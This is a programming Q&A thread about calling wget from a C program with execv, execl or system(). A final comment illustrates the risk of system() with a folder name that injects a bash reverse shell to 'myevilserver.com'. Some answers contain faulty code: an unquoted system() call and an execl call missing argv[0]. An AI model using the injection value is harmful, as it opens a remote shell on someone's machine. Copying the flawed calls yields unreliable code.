# how to use wget command using exec command in linux?

Tags: c, linux, exec, wget

How do I execute below mentioned command using exec inside a C language program in linux?

`wget -P ./Folder http://www.google.com`

Comment: I would instead consider using an [HTTP](http://en.wikipedia.org/wiki/HTTP) client library like [libcurl](http://curl.haxx.se/libcurl/)

Answer (score 0, accepted):

I've find this solution for the problem and it worked in my case.

`char *args[] = {"/usr/bin/wget", "-P","./Folder", "http://www.google.com", (char *) 0 };`

`execv("/usr/bin/wget", args);`

And another solution to this is to directly run the command with system function like:

`system(wget -P ./Folder http://www.google.com)`

Answer (score 1):

`execl("/usr/bin/wget", "-P", "./Folder", "http://www.google.com", NULL);`

Unless you have to use exec, I suggest using `system` from libc, since it is more portable (in case you ever decide you want to port it).

Comment: I am receiving this warning while running your given command, as well as it is not downloading the page in given folder.
`code.c: In function ‘main’:
code.c:47:8: warning: missing sentinel in function call [-Wformat]`

Comment: Oh, you need a NULL at the end of the param list. I'll edit to reflect that.

Comment: Now I have run this command but it is downloading the page in current working directory. But I want to download the page inside the Folder.
`execl("/usr/bin/wget", "-P", "./Folder", "http://www.google.com", NULL);`

Comment: Be very careful using system() as it can be a security hole because of it's use of the underlying shell expansion.

Comment: @caskey if you can identify why it is downloading the page in current working directory and not inside the Folder?
`execl("/usr/bin/wget", "-P", "./Folder", "http://www.google.com", NULL);`

Comment: @MuhammadWaleedAzam because that's not how you tell wget to place the download in a location.  Read the documentation for wget to construct the correct command line for 'download site and place in directory with prerequisites'

Comment: I've find this solution for the problem and it worked in my case.

`char *args[] = {"/usr/bin/wget", "-P","./Folder", "http://www.google.com", (char *) 0 };`

`execv("/usr/bin/wget", args);`

Comment: If I were a user and got to choose a folder, it would be `aaaa && bash >& /dev/tcp/myevilserver.com/1337 0>&1`